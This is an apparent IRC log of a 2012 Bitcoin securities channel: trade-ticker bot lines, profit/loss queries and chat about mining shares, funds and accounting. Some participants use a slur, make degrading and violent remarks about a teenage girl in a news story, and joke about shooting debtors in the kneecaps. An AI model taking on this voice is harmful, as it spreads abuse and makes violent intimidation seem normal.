https://bitcointalk.org/index.php?topic=75126.0 Oct 01 16:48:48 a ty Oct 01 16:48:52 [GLBSE] [BITBOND] 1 @ 0.27 BTC [-] Oct 01 16:49:41 [GLBSE] [PUREMINING] 1 @ 0.10277 BTC [+] Oct 01 16:51:51 lmao how many more satoshi* and *dice sites can there be Oct 01 16:52:25 [GLBSE] [GSDPT] 290 @ 0.0034 = 0.986 BTC [-] Oct 01 16:52:34 !pl mpoe.etf .1 Oct 01 16:52:34 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 16:52:50 MPOE.ETF [1@0.1BTC] paid: 0.02470282 BTC. Last price: 0.3 BTC. Capital gain: 0.2 BTC. Total: 0.22470282 BTC. (224.7%) Oct 01 16:52:59 !ticker mpoe.etf Oct 01 16:53:06 [GLBSE:MPOE.ETF] [Bid: 0.3] [Ask: 1.19999999] [Spread: 0.89999999] [Last: 0.3] [24hVol: ] [7dAvg: 0.645] Oct 01 16:53:11 ouch spread. Oct 01 16:53:33 :D Oct 01 16:53:34 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [-] Oct 01 16:53:36 smickles maybe you should sell some s.mpoe put some buys in ? Oct 01 16:55:24 https://bitcointalk.org/index.php?topic=97094.msg1069337#msg1069337 ahaha burt is so much win Oct 01 16:56:27 mircea_popescu: i'm actually about to do something about that Oct 01 16:56:47 also: https://bitcointalk.org/index.php?topic=114442.msg1235468#msg1235468 so a >200% gain is a loss? Oct 01 16:57:08 that guy is a little... weird. Oct 01 16:57:09 and MPOE.ETF isn't actually a passthru, but there isn't a S.MPOE passthru on GLBSE Oct 01 16:57:32 ya it's a fund, which is why i said about selling some shares to put bids, you actually have the flexibility to do that Oct 01 16:57:44 I sent 'em a pm presenting the facts and requested an edit be made :/ Oct 01 16:58:06 you could prolly make money by tapping the glbse equity flight Oct 01 16:58:16 as in, put buys in 5% or 10% under what you get for the shares on mpex Oct 01 16:58:39 increase the etf value by trading Oct 01 16:59:02 up until recently, I was considering a lower % than 5/10 Oct 01 16:59:14 well whatever works Oct 01 16:59:18 maybe go in gradual Oct 01 16:59:44 .3 means what, less than 30% of current s.mpoe value ? Oct 01 17:01:52 something about there Oct 01 17:01:54 [GLBSE] [GSDPT] 155 @ 0.0034 = 0.527 BTC [-] Oct 01 17:04:39 Local Rules: the following accounts are banned from posting in this thread: Puppet, EskimoBob, Deprived, Factory, nimda, 556j, MPOE-PR, cunicula and guruvan. Oct 01 17:04:50 someone should make a forum post whereby the forum is forbidden from posting Oct 01 17:05:19 then maybe complain that nobody's posting Oct 01 17:06:23 jeez, i can't log into glbse Oct 01 17:06:28 it keeps timing out Oct 01 17:07:39 mmm Oct 01 17:07:42 that's not so good Oct 01 17:07:46 ;;last seen nefario Oct 01 17:07:46 (last [--{from,in,on,with,without,regexp} ] [--nolimit]) -- Returns the last message matching the given criteria. --from requires a nick from whom the message came; --in requires a channel the message was sent to; --on requires a network the message was sent on; --with requires some string that had to be in the message; --regexp requires a regular expression the message must (1 more message) Oct 01 17:07:50 ;;seen nefario Oct 01 17:07:51 nefario was last seen in #bitcoin-assets 6 days, 18 hours, 7 minutes, and 54 seconds ago: Those assets are not listed or traded anymore Oct 01 17:07:57 [MPEX] [F.GIGA.ETF] 1087 @ 0.00044185 = 0.4803 BTC [-] Oct 01 17:08:11 today is the worst day Oct 01 17:08:13 and ill tell you why Oct 01 17:08:19 cause i have to look at how much mone ywe have Oct 01 17:08:21 then give it away Oct 01 17:08:30 stupid companies Oct 01 17:08:41 and i need to send like $100 on a stupid upgrade for our billing system Oct 01 17:08:45 cause they revoked our license Oct 01 17:08:48 cause theyre french retards Oct 01 17:08:52 alright, got in Oct 01 17:08:56 SMICKLES Oct 01 17:08:58 GOT IN Oct 01 17:08:59 everyone Oct 01 17:09:09 heh Oct 01 17:09:42 i got packeted last niht Oct 01 17:09:42 well, does anyone have some btc 'on' GLBSE so as to facilitate a quick deposit for me? Oct 01 17:09:44 night* Oct 01 17:09:54 hmm Oct 01 17:09:59 i know someone who does Oct 01 17:10:02 smickles kakobrekla smpake ? Oct 01 17:10:04 but hes afk Oct 01 17:10:10 btc-mining Oct 01 17:10:23 mircea_popescu: smpake does glbse now? Oct 01 17:10:30 i thought it did no ? Oct 01 17:10:49 rg suffer baby :D Oct 01 17:10:56 naw, just mtgox Oct 01 17:11:04 i hate this part of the month Oct 01 17:11:05 its like wow Oct 01 17:11:07 look how much money we have Oct 01 17:11:09 thne its like oh Oct 01 17:11:10 dun dun dun Oct 01 17:11:12 we gotta pay all our bills Oct 01 17:11:15 and then do divs Oct 01 17:11:27 rg, that's why you do cost basis, not cash basis accounting ;P Oct 01 17:11:45 yeah Oct 01 17:11:47 i like cash basis, it's sexier Oct 01 17:11:47 whatever that maens Oct 01 17:11:51 i knowh ow to add the monies Oct 01 17:11:56 and subtract the monies Oct 01 17:12:00 and multiply the monies Oct 01 17:12:01 and feel the tittes Oct 01 17:12:01 but that's it Oct 01 17:12:14 sometimes i divide Oct 01 17:12:17 but i use gribble for that Oct 01 17:12:20 rg you should get the gnucash btw. Oct 01 17:12:28 what's that Oct 01 17:12:33 some GNU piece of shit quickbooks replacement Oct 01 17:12:36 Bitcoin Broadcast Station hits 3000+ Views Oct 01 17:12:39 gnucash supports bitcoin/ 8 decimals? Oct 01 17:12:41 dude wtf, my penis has 3000 views Oct 01 17:13:04 smickles i think you have to fiddle with it for that Oct 01 17:13:32 aw sweet Oct 01 17:13:40 nominet is dropping the co from co.uk Oct 01 17:13:47 so you can get rg.uk Oct 01 17:13:55 took em long enough Oct 01 17:14:00 yeah no shi Oct 01 17:14:01 t Oct 01 17:14:05 no one takes co.anything seriously Oct 01 17:14:09 indeed. Oct 01 17:19:11 rg.xxx is better Oct 01 17:19:19 i would help you admin a gay porn site Oct 01 17:19:26 just so you can get the domain Oct 01 17:32:17 [GLBSE] [GSDPT] 72 @ 0.0034 = 0.2448 BTC [-] Oct 01 17:33:05 [MPEX] [F.GIGA.ETF] 1695 @ 0.00044185 = 0.7489 BTC [-] Oct 01 17:33:07 [MPEX] [F.GIGA.ETF] 7000 @ 0.00044185 = 3.093 BTC [-] Oct 01 17:33:08 [MPEX] [F.GIGA.ETF] 105 @ 0.00044185 = 0.0464 BTC [-] Oct 01 17:33:10 http://www.dailymail.co.uk/news/article-2210364/Anastasiya-Shpagina-Teenage-girl-living-cartoon-character.html?openGraphAuthor=%2Fhome%2Fsearch.html%3Fs%3D%26authornamef%3DKerry%2BMcdermott Oct 01 17:34:38 mircea_popescu: have you come across thos 'hysterical literature' videos on youtube? Oct 01 17:34:59 they remind me of a warhol video Oct 01 17:36:05 rg: where do you host your shit? Oct 01 17:41:37 smickles not really, i don't youtube so much Oct 01 17:42:48 [GLBSE] [FPGAMINING] 8 @ 0.4699 = 3.7592 BTC [-] Oct 01 17:46:53 [GLBSE] [BMF] 1 @ 0.45 BTC [-] Oct 01 17:47:31 [GLBSE] [BMF] 1 @ 0.40000001 BTC [-] Oct 01 17:48:10 [GLBSE] [GSDPT] 5528 @ 0.0034 = 18.7952 BTC [-] Oct 01 17:50:00 [GLBSE] [BMMO] 1 @ 0.04000007 BTC [-] Oct 01 17:50:02 [GLBSE] [BMMO] 3 @ 0.04000001 = 0.12 BTC [-] Oct 01 17:50:03 [GLBSE] [BMMO] 25 @ 0.04 = 1 BTC [-] Oct 01 17:58:14 [MPEX] [S.MPOE] 20900 @ 0.00035853 = 7.4933 BTC [-] Oct 01 17:58:16 [MPEX] [S.MPOE] 32600 @ 0.00036081 = 11.7624 BTC [+] Oct 01 18:06:37 [GLBSE] [GIGAMINING] 5 @ 0.59919993 = 2.996 BTC [-] Oct 01 18:09:21 [GLBSE] [MMM] 14 @ 0.6 = 8.4 BTC [+] Oct 01 18:12:55 [GLBSE] [NASTY] 1 @ 0.43 BTC [+] Oct 01 18:16:23 http://www.dailymail.co.uk/news/article-2210364/Anastasiya-Shpagina-Teenage-girl-living-cartoon-character.html?openGraphAuthor=%2Fhome%2Fsearch.html%3Fs%3D%26authornamef%3DKerry%2BMcdermott Oct 01 18:16:31 ^^ MAN THAT IS SICK Oct 01 18:17:46 seriously that is f*cking sick, probably got wacked against the wall when she was a baby Oct 01 18:18:46 I'd whack her against the wall if you know what I mean Oct 01 18:19:01 meh, to each their own Oct 01 18:19:10 she's just a very good stripper Oct 01 18:19:13 plays the weaboo angle Oct 01 18:19:20 it's just makeup Oct 01 18:19:32 the only stripping there involves paint stripper Oct 01 18:19:52 copumpkin it usually is. Oct 01 18:23:49 [MPEX] [F.GIGA.ETF] 3000 @ 0.00044186 = 1.3256 BTC [+] Oct 01 18:23:51 [MPEX] [F.GIGA.ETF] 7500 @ 0.00044186 = 3.314 BTC [+] Oct 01 18:29:01 make up can even let an ugly twat looks nice Oct 01 18:29:18 [MPEX] [S.MPOE] 50200 @ 0.00035823 = 17.9831 BTC [-] Oct 01 18:29:19 [MPEX] [S.MPOE] 50274 @ 0.00035811 = 18.0036 BTC [-] Oct 01 18:29:20 [MPEX] [S.MPOE] 4171 @ 0.00035552 = 1.4829 BTC [-] Oct 01 18:29:21 [MPEX] [S.MPOE] 57400 @ 0.00035541 = 20.4005 BTC [-] Oct 01 18:29:22 [MPEX] [S.MPOE] 30600 @ 0.0003542 = 10.8385 BTC [-] Oct 01 18:29:24 [MPEX] [S.MPOE] 1463171 @ 0.00035 = 512.1099 BTC [-] Oct 01 18:31:39 oh boy Oct 01 18:32:14 hm Oct 01 18:33:32 what a deep knowledge :9 bet he woke up next to one last night Oct 01 18:34:02 [GLBSE] [BITBOND] 1 @ 0.32 BTC [+] Oct 01 18:34:03 just a hint, its not only the makeup, also the alcohol :) Oct 01 18:34:04 [GLBSE] [BITBOND] 1 @ 0.29000001 BTC [-] Oct 01 18:34:05 [GLBSE] [BITBOND] 5 @ 0.29 = 1.45 BTC [-] Oct 01 18:35:03 [GLBSE] [GIGAMINING] 1 @ 0.59979999 BTC [+] Oct 01 18:36:02 [GLBSE] [BITBOND] 1 @ 0.29000001 BTC [+] Oct 01 18:36:03 [GLBSE] [BITBOND] 1 @ 0.29 BTC [-] Oct 01 18:39:38 [GLBSE] [BITBOND] 1 @ 0.29000001 BTC [+] Oct 01 18:39:40 [GLBSE] [BITBOND] 1 @ 0.29 BTC [-] Oct 01 18:49:19 Is that such an amazing trait? o.O Oct 01 18:49:45 http://boingboing.net/2012/10/01/post-gangnam-style-americ.html Oct 01 18:49:49 we're fucke Oct 01 18:50:55 [GLBSE] [GOLD] 3 @ 0.00999998 = 0.03 BTC [-] Oct 01 18:51:16 usagi: okay so fine, Im a giant robot pilot Oct 01 18:51:22 Diablo-D3: http://youtu.be/-hDotwzR9d4 is the best (you have to watch it all) :p Oct 01 18:51:49 Azelphur: oh fuck me Oct 01 18:51:53 lol Oct 01 18:55:19 [MPEX] [S.MPOE] 14700 @ 0.00035498 = 5.2182 BTC [+] Oct 01 18:55:21 [GLBSE] [BBBB] 1 @ 0.00015999 BTC [+] Oct 01 18:56:57 [GLBSE] [BBBB] 196 @ 0.00016 = 0.0314 BTC [+] Oct 01 18:57:20 Azelphur: bwhahaha Oct 01 18:57:23 it finally ends Oct 01 18:57:32 :D Oct 01 18:57:52 it does, right at the end Oct 01 18:59:28 [MPEX] [S.MPOE] 61800 @ 0.00035559 = 21.9755 BTC [+] Oct 01 18:59:29 [MPEX] [S.MPOE] 7027 @ 0.00036081 = 2.5354 BTC [+] Oct 01 18:59:30 [MPEX] [S.MPOE] 37032 @ 0.00036249 = 13.4237 BTC [+] Oct 01 18:59:31 [MPEX] [S.MPOE] 14141 @ 0.00036422 = 5.1504 BTC [+] Oct 01 18:59:52 !ticker s.mpoe Oct 01 18:59:54 [MPEX:S.MPOE] 1day: 0.00035 / 0.00035512 / 0.00036664 (3646645 shares, 1,295.00 BTC), 30day: 0.00034 / 0.00039062 / 0.00042 (64063806 shares, 25,024.88 BTC) Oct 01 19:01:38 [GLBSE] [YABMC] 6 @ 0.07961 = 0.4777 BTC [+] Oct 01 19:01:39 [GLBSE] [YABMC] 4 @ 0.07971 = 0.3188 BTC [+] Oct 01 19:09:16 !ticker s.dice Oct 01 19:09:17 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (16195 shares, 55.06 BTC), 30day: 0.0033 / 0.00337125 / 0.0034 (2079730 shares, 7,011.31 BTC) Oct 01 19:09:35 !ticker s.bvps Oct 01 19:09:37 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.001175 / 0.00342157 / 0.003801 (52687 shares, 180.27 BTC) Oct 01 19:14:37 [GLBSE] [BITBOND] 4 @ 0.21999999 = 0.88 BTC [-] Oct 01 19:16:22 [GLBSE] [BITBOND] 1 @ 0.22 BTC [+] Oct 01 19:22:56 [MPEX] [S.BVPS] 150 @ 0.00341357 = 0.512 BTC [+] Oct 01 19:25:10 AHAHAHA http://i.imgur.com/qdZ5O.png << THAT is what a btc-laundry should look like (http://www.iseecoins.org/) Oct 01 19:29:09 grubkes Oct 01 19:29:11 just the man i need to see Oct 01 19:29:18 usagi wa unagi ni natta Oct 01 19:30:34 became Oct 01 19:30:36 MrTiggr can you explain it ? Oct 01 19:30:54 not to be confused with nareru Oct 01 19:31:44 mircea_popescu: that is based off the "unconfirmed transactions" feed ... every dot is a btc address .. the lines are coins moving between them ... the line color is the same for coins moved in the same transaction Oct 01 19:31:56 known bitcoin addresses are labelled Oct 01 19:32:01 aha Oct 01 19:32:05 interesting visual for sure Oct 01 19:32:11 layout uses a force-directed algo to best position stuff Oct 01 19:32:17 turn autolayout on for best effect Oct 01 19:34:36 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [+] Oct 01 19:34:38 [GLBSE] [GIGAMINING] 4 @ 0.59515 = 2.3806 BTC [-] Oct 01 19:34:39 [GLBSE] [GIGAMINING] 10 @ 0.595 = 5.95 BTC [-] Oct 01 19:34:40 [GLBSE] [GIGAMINING] 8 @ 0.5901 = 4.7208 BTC [-] Oct 01 19:34:42 [GLBSE] [GIGAMINING] 1 @ 0.59 BTC [-] Oct 01 19:34:43 [GLBSE] [GIGAMINING] 1 @ 0.58095 BTC [-] Oct 01 19:34:43 [GLBSE] [GIGAMINING] 1 @ 0.5807 BTC [-] Oct 01 19:34:44 [GLBSE] [GIGAMINING] 3 @ 0.58050001 = 1.7415 BTC [-] Oct 01 19:34:45 [GLBSE] [GIGAMINING] 1 @ 0.5805 BTC [-] Oct 01 19:34:46 [GLBSE] [GIGAMINING] 1 @ 0.5803 BTC [-] Oct 01 19:34:48 [GLBSE] [GIGAMINING] 1 @ 0.58 BTC [-] Oct 01 19:34:49 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Oct 01 19:37:28 im glad we have some action today Oct 01 19:37:31 id like to see some more Oct 01 19:38:13 [GLBSE] [BBBB] 500 @ 0.00016 = 0.08 BTC [+] Oct 01 19:38:53 [GLBSE] [ASICMINER] 13 @ 0.11189999 = 1.4547 BTC [+] Oct 01 19:38:55 [GLBSE] [ASICMINER] 1 @ 0.1119 BTC [+] Oct 01 19:42:32 [GLBSE] [PUREMINING] 1 @ 0.09030001 BTC [-] Oct 01 19:43:27 grubiesssss Oct 01 19:43:28 wake up Oct 01 19:43:31 we gotta pay these bills son Oct 01 19:44:23 ;;seen grubles Oct 01 19:44:24 grubles was last seen in #bitcoin-assets 34 minutes and 48 seconds ago: !ticker s.bvps Oct 01 19:44:31 power nap Oct 01 19:46:13 lol Oct 01 19:48:07 [MPEX] [S.MPOE] 30693 @ 0.00036422 = 11.179 BTC [+] Oct 01 19:48:51 i could just pay them all in btc Oct 01 19:49:03 but i was a lamer and lent some money to a friend Oct 01 19:49:05 who needed it Oct 01 19:49:09 and hes afk Oct 01 19:49:30 i wish i had some muscle Oct 01 19:49:33 a team of muscle Oct 01 19:49:34 around the US Oct 01 19:49:36 then i could do lending Oct 01 19:49:50 you dont pay, fine, as long as its worth your knee cap Oct 01 19:49:59 two taps to 1 knee cap Oct 01 19:50:01 1 to break it Oct 01 19:50:09 1 to cause bad pain Oct 01 19:51:24 [GLBSE] [MOVETO.FUND] 1 @ 0.56100009 BTC [-] Oct 01 19:52:36 [GLBSE] [GIGAMINING] 5 @ 0.6089 = 3.0445 BTC [+] Oct 01 19:55:24 [GLBSE] [PUREMINING] 1 @ 0.10256999 BTC [+] Oct 01 19:57:13 [GLBSE] [PUREMINING] 2 @ 0.10257 = 0.2051 BTC [+] Oct 01 19:58:05 [GLBSE] [TEEK.USD] 1 @ 0.0625 BTC [-] Oct 01 20:01:04 [GLBSE] [NASTY] 1 @ 0.45389999 BTC [+] Oct 01 20:01:05 [GLBSE] [NASTY] 1 @ 0.4539 BTC [+] Oct 01 20:03:44 [GLBSE] [MU] 1 @ 0.18998999 BTC [+] Oct 01 20:04:55 [GLBSE] [MU] 2 @ 0.18999 = 0.38 BTC [+] Oct 01 20:08:10 [GLBSE] [ASICMINER] 1 @ 0.11189999 BTC [-] Oct 01 20:08:40 [GLBSE] [SILVER] 1 @ 0.0095 BTC [-] Oct 01 20:08:41 [GLBSE] [SILVER] 11 @ 0.00935001 = 0.1029 BTC [-] Oct 01 20:08:42 [GLBSE] [SILVER] 27 @ 0.0091111 = 0.246 BTC [-] Oct 01 20:08:43 [GLBSE] [SILVER] 3 @ 0.0091 = 0.0273 BTC [-] Oct 01 20:08:45 [GLBSE] [SILVER] 45 @ 0.009 = 0.405 BTC [-] Oct 01 20:10:07 [GLBSE] [RAREEARTH] 5 @ 0.00999999 = 0.05 BTC [-] Oct 01 20:10:29 [GLBSE] [RAREEARTH] 10 @ 0.0099 = 0.099 BTC [-] Oct 01 20:10:30 [GLBSE] [RAREEARTH] 10 @ 0.0098 = 0.098 BTC [-] Oct 01 20:10:31 [GLBSE] [RAREEARTH] 10 @ 0.0097 = 0.097 BTC [-] Oct 01 20:10:33 [GLBSE] [RAREEARTH] 2 @ 0.00960001 = 0.0192 BTC [-] Oct 01 20:10:34 [GLBSE] [RAREEARTH] 13 @ 0.0096 = 0.1248 BTC [-] Oct 01 20:10:35 [GLBSE] [RAREEARTH] 4 @ 0.0095 = 0.038 BTC [-] Oct 01 20:10:36 [GLBSE] [RAREEARTH] 1 @ 0.0092 BTC [-] Oct 01 20:10:37 [GLBSE] [RAREEARTH] 15 @ 0.00900125 = 0.135 BTC [-] Oct 01 20:13:11 [MPEX] [F.GIGA.ETF] 200 @ 0.00044186 = 0.0884 BTC [+] Oct 01 20:16:03 anyone here use pympex Oct 01 20:17:36 [GLBSE] [MU] 2 @ 0.18999 = 0.38 BTC [+] Oct 01 20:17:37 [GLBSE] [MU] 5 @ 0.19 = 0.95 BTC [+] Oct 01 20:24:26 I missed him Oct 01 20:24:54 I got 2 already, high score! Oct 01 20:25:14 the downsides of having a name that begins with A, I'm high up on all the userlists :p Oct 01 20:28:46 Time to change your nick to Zazelphur Oct 01 20:28:50 :) Oct 01 20:29:08 indeed Oct 01 20:29:17 Azelphur, you wrote pympex right? Oct 01 20:29:21 yes Oct 01 20:30:10 ive signed the mpex key, and yet i still get "Couldn't decode the reply from MPEx...blah" errors Oct 01 20:31:17 ffs why have the butts started again? :( Oct 01 20:31:57 grubles: all my python does is call gnupg library, which runs the gpg executable Oct 01 20:32:15 so key decryption not working is 99.9% on gpg side Oct 01 20:32:25 EskimoBob: or just /umode +R Oct 01 20:32:40 [GLBSE] [GSDPT] 292 @ 0.00388887 = 1.1356 BTC [+] Oct 01 20:32:42 [GLBSE] [GSDPT] 2708 @ 0.00388888 = 10.5311 BTC [+] Oct 01 20:34:28 [GLBSE] [ARS] 50 @ 0.0148 = 0.74 BTC [-] Oct 01 20:35:48 [GLBSE] [YABMC] 2 @ 0.07034001 = 0.1407 BTC [-] Oct 01 20:35:50 [GLBSE] [YABMC] 2 @ 0.07034 = 0.1407 BTC [-] Oct 01 20:35:51 [GLBSE] [YABMC] 8 @ 0.070321 = 0.5626 BTC [-] Oct 01 20:35:52 [GLBSE] [YABMC] 1 @ 0.07032 BTC [-] Oct 01 20:35:54 [GLBSE] [YABMC] 1 @ 0.07022 BTC [-] Oct 01 20:35:55 [GLBSE] [YABMC] 7 @ 0.0702 = 0.4914 BTC [-] Oct 01 20:38:42 [MPEX] [F.GIGA.ETF] 6500 @ 0.00044185 = 2.872 BTC [-] Oct 01 20:39:16 [GLBSE] [YABMC] 2 @ 0.07034002 = 0.1407 BTC [+] Oct 01 20:49:27 [GLBSE] [COGNITIVE] 1 @ 0.5999 BTC [-] Oct 01 20:51:38 [GLBSE] [FPGA.CONTRACT] 10 @ 0.06994 = 0.6994 BTC [-] Oct 01 20:59:26 [MPEX] [S.DICE] 195 @ 0.00325001 = 0.6338 BTC [-] Oct 01 21:00:38 [GLBSE] [ASICMINER] 1 @ 0.1118 BTC [-] Oct 01 21:03:43 [GLBSE] [GIGAMINING] 3 @ 0.60499997 = 1.815 BTC [-] Oct 01 21:04:45 [GLBSE] [ZETA-MINING] 1 @ 0.14210003 BTC [-] Oct 01 21:04:47 [GLBSE] [ZETA-MINING] 1 @ 0.14210002 BTC [-] Oct 01 21:08:16 EskimoBob: You can do /umode +R, it's the fastest way Oct 01 21:08:40 fyi, http://bit4x.com just went live Oct 01 21:08:46 progressively over-valuing your assets more and more based on some combination of beliefs, guesses, believing people who tell you things on irc and total lunacy. Oct 01 21:08:51 i like this guy. Oct 01 21:09:01 that's like... 90% of btc fund managers right there. Oct 01 21:09:35 Who? Oct 01 21:10:37 https://bitcointalk.org/index.php?topic=97178.msg1236472#msg1236472 Oct 01 21:11:13 [GLBSE] [ZETA-MINING] 1 @ 0.14220003 BTC [+] Oct 01 21:11:15 [GLBSE] [ZETA-MINING] 4 @ 0.14220002 = 0.5688 BTC [-] Oct 01 21:13:15 [GLBSE] [ZETA-MINING] 5 @ 0.14220002 = 0.711 BTC [-] Oct 01 21:15:22 Q: Does NYAN Financial use GAAP? Oct 01 21:15:44 and so it dies https://bitcointalk.org/index.php?topic=114686.0 Oct 01 21:16:18 [GLBSE] [MMM] 3 @ 0.6 = 1.8 BTC [+] Oct 01 21:16:33 Bugpowder: it will now that smickles is going to do their shit Oct 01 21:16:56 In fairness, BAC, JPM, WFC weren't marking their MBS to market either. Oct 01 21:17:21 But I don't think the Fed is going to come in and exchange Treasuries for for NYAN.B shares any time soon. Oct 01 21:18:47 mbs is down 1? Oct 01 21:20:39 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:20:45 BMF [1@0.49BTC] (since: 2012-09-25) paid: 0.01112149 BTC. Last price: 0.40000001 BTC. Capital gain: -0.08999999 BTC. Total: -0.0788785 BTC. (-16.1%) Oct 01 21:21:10 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:21:12 BMF [1@1BTC] paid: 0.10922454 BTC. Last price: 0.40000001 BTC. Capital gain: -0.59999999 BTC. Total: -0.49077545 BTC. (-49.1%) Oct 01 21:21:19 bmf never IPO'ed at 1 though Oct 01 21:21:29 or wait, was that cpa that didnt Oct 01 21:21:40 Was CPA at 0.10 Oct 01 21:21:50 now trading around 0.03 Oct 01 21:21:51 bmf ipo was 1 Oct 01 21:21:58 I should take notes. Oct 01 21:22:02 usagi: dude, I should do that Oct 01 21:22:21 DMC, now worth 9000 BTC PER SHARE lawls Oct 01 21:23:11 !pl BTC-MINING 1 Oct 01 21:23:11 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:23:17 !pl BTC-BOND 0.01 Oct 01 21:23:24 BTC-MINING [1@1BTC] paid: 0.27012647 BTC. Last price: 0.921 BTC. Capital gain: -0.079 BTC. Total: 0.19112647 BTC. (19.1%) Oct 01 21:23:24 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:23:35 BTC-BOND [1@0.01BTC] paid: 0.00055 BTC. Last price: 0.00989 BTC. Capital gain: -0.00011 BTC. Total: 0.00044 BTC. (4.4%) Oct 01 21:23:54 those %s are so useless w/o any indication of time Oct 01 21:24:22 See how the high price on all these MBS's was 100. They all crashed, banks pulled a Usagi and valued them higher than the market price, but 5 years later most are still shitcanned. http://www.markit.com/en/products/data/indices/structured-finance-indices/abx/abx-prices.page? Oct 01 21:24:23 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:24:56 BMF [1@0.5BTC] (since: 2012-09-01) paid: 0.05279685 BTC. Last price: 0.40000001 BTC. Capital gain: -0.09999999 BTC. Total: -0.04720314 BTC. (-9.4%) Oct 01 21:24:56 [MPEX] [F.GIGA.ETF] 192 @ 0.00044185 = 0.0848 BTC [-] Oct 01 21:24:56 [MPEX] [F.GIGA.ETF] 8700 @ 0.00044185 = 3.8441 BTC [-] Oct 01 21:24:57 !pl [@] [] Oct 01 21:25:02 BUT Fed swapped them for treasuries. There is no Fed in bitcoin. Oct 01 21:25:09 BTC-Mining about 5 months, BTC-Bond about 2 months Oct 01 21:26:02 usagi: I know how you feel Oct 01 21:26:03 Why the fuck should mining companies care about the share price anyway? You got the BTC, you buy the gear, you mine, you pay the dividends. Oct 01 21:26:21 Bugpowder: bmf was a fund, now its turning into a mining company Oct 01 21:26:37 however, bmf was a closed fund, so NAV may not even matter Oct 01 21:26:52 GLBSE shares are not a company. Oct 01 21:28:15 usagi: okay hows this Oct 01 21:28:21 how long are you going to be doing daily dividend Oct 01 21:28:40 not worth it :< Oct 01 21:28:50 if it was FOREVERERERERERER I'd buy some BMF Oct 01 21:29:47 well, BTCMC will pay me 15 BTC today Oct 01 21:29:53 that reminds me, I need to go poke yochdog Oct 01 21:30:30 I'd buy BMF around 0.30 right now =/ Oct 01 21:31:59 yeah but I own 106 BTC-MINING Oct 01 21:32:05 Yeah but we pay out from a loan. Oct 01 21:32:05 and 0 BMF Oct 01 21:32:13 !ticker btc-mining Oct 01 21:32:15 !ticker btcmc Oct 01 21:32:18 !ticker asicminer Oct 01 21:32:19 [GLBSE:BTC-MINING] [Bid: 0.92525] [Ask: 0.97479999] [Spread: 0.04954999] [Last: 0.921] [24hVol: 18.02480001] [7dAvg: 0.9211356] Oct 01 21:32:24 [GLBSE:BTCMC] [Bid: 0.45] [Ask: 0.58979999] [Spread: 0.13979999] [Last: 0.45000001] [24hVol: ] [7dAvg: 0.48714] Oct 01 21:32:33 [GLBSE:ASICMINER] [Bid: 0.106] [Ask: 0.1118] [Spread: 0.0058] [Last: 0.1118] [24hVol: 49.66689507] [7dAvg: 0.1096124] Oct 01 21:32:49 what? All in BTC-BOND? Oct 01 21:33:08 You mean BITBOND? Oct 01 21:33:43 er, isnt btc-bond btc-mining's? Oct 01 21:34:52 BTC-Mining: you're late paying again Oct 01 21:35:03 BTC-BOND isn't looking healthy? Oct 01 21:35:14 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:35:29 GIGAMINING [1@1.5BTC] (since: 2012-06-1) paid: 0.32565895 BTC. Last price: 0.60499997 BTC. Capital gain: -0.89500003 BTC. Total: -0.56934108 BTC. (-38%) Oct 01 21:36:15 How so is BTC-BOND not looking healthy? Oct 01 21:38:01 Hey, can't only blame the mining sector losing value. You got to trade and cut losses. Oct 01 21:38:21 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:38:55 GIGAMINING [1@1BTC] paid: 0.48117596 BTC. Last price: 0.60499997 BTC. Capital gain: -0.39500003 BTC. Total: 0.08617593 BTC. (8.6%) Oct 01 21:39:20 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:39:22 GIGAMINING [1@1.5BTC] paid: 0.48117596 BTC. Last price: 0.60499997 BTC. Capital gain: -0.89500003 BTC. Total: -0.41382407 BTC. (-27.6%) Oct 01 21:39:42 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:39:54 GIGAMINING [1@1BTC] paid: 0.48117596 BTC. Last price: 0.60499997 BTC. Capital gain: -0.39500003 BTC. Total: 0.08617593 BTC. (8.6%) Oct 01 21:39:54 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:40:16 GIGAMINING [1@1.5BTC] (since: 2012-06-01) paid: 0.32565895 BTC. Last price: 0.60499997 BTC. Capital gain: -0.89500003 BTC. Total: -0.56934108 BTC. (-38%) Oct 01 21:40:45 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:40:53 usagi, what about the dividend payouts from gigamining during that time? Oct 01 21:41:03 NYAN.A [1@1BTC] paid: 0.09 BTC. Last price: 0.99 BTC. Capital gain: -0.01 BTC. Total: 0.08 BTC. (8%) Oct 01 21:41:16 If it wasn't for the dividends Oct 01 21:41:16 i get it now Oct 01 21:42:01 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:42:12 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.034 BTC. Capital gain: -0.066 BTC. Total: -0.06030312 BTC. (-60.3%) Oct 01 21:42:12 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:42:15 BMF [1@1BTC] paid: 0.10922454 BTC. Last price: 0.40000001 BTC. Capital gain: -0.59999999 BTC. Total: -0.49077545 BTC. (-49.1%) Oct 01 21:42:15 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:42:17 NASTY [1@0.8BTC] (since: 2012-08-05) paid: 0.01422903 BTC. Last price: 0.4539 BTC. Capital gain: -0.3461 BTC. Total: -0.33187097 BTC. (-41.5%) Oct 01 21:42:17 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 21:42:23 